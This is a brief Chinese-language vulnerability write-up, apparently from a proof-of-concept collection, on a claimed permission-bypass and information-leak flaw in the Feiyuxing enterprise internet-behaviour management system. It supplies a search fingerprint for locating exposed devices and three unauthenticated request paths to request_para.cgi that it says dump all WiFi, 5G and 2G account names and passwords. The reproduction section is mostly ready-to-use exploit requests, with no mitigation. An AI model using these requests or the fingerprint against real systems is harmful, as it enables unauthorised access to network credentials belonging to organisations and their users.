飞鱼星企业级智能上网行为管理系统权限绕过信息泄露漏洞¶

漏洞描述¶

飞鱼星企业级智能上网行为管理系统存在权限绕过以及信息泄露漏洞，可以获取管理员权限以及用户密码

漏洞影响¶

飞鱼星企业级智能上网行为管理系统

网络测绘¶

title="飞鱼星企业级智能上网行为管理系统"

漏洞复现¶

信息泄露POC

/request_para.cgi?parameter=wifi_info        #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码